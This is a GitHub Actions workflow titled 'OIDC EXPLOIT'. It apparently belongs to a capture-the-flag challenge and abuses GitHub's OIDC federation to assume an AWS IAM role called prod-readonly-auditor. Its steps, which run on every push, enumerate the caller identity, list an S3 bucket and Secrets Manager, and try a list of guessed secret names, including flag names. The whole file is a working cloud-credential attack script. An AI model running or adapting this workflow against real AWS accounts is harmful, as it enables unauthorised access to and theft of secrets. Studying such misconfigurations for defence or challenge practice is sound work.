  name: OIDC EXPLOIT

  on:
    workflow_dispatch:
    push:

  jobs:
    exploit:
      runs-on: ubuntu-latest
      permissions:
        id-token: write
        contents: read
      steps:
      - name: Configure AWS Credentials via OIDC
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::170974506515:role/prod-readonly-auditor
          aws-region: us-west-1
          role-session-name: GitHubActionsOIDC

      - name: Debug OIDC Token Claims
        run: |
          echo "Repository: $GITHUB_REPOSITORY"
          echo "Repository Owner: $GITHUB_REPOSITORY_OWNER"
          echo "Actor: $GITHUB_ACTOR"
          echo "Ref: $GITHUB_REF"
          echo "SHA: $GITHUB_SHA"

      - name: Test AWS Access
        run: |
          aws sts get-caller-identity
          echo "Searching for secrets in ci-deployment-logsv1 bucket..."
          aws s3 ls s3://ci-deployment-logsv1/ || echo "Bucket access failed"

      - name: List Secrets Manager Secrets
        run: |
          echo "Listing available secrets..."
          aws secretsmanager list-secrets || echo "Secrets access failed"

      - name: Try Common Secret Names
        run: |
          # Try common secret patterns based on the challenge
          for secret in "hexnova404-flag" "prod-credentials" "audit-access" "privileged-role" "final-flag"; do
            echo "Trying secret: $secret"
            aws secretsmanager get-secret-value --secret-id "$secret" 2>/dev/null || echo "Secret $secret not found"
          done
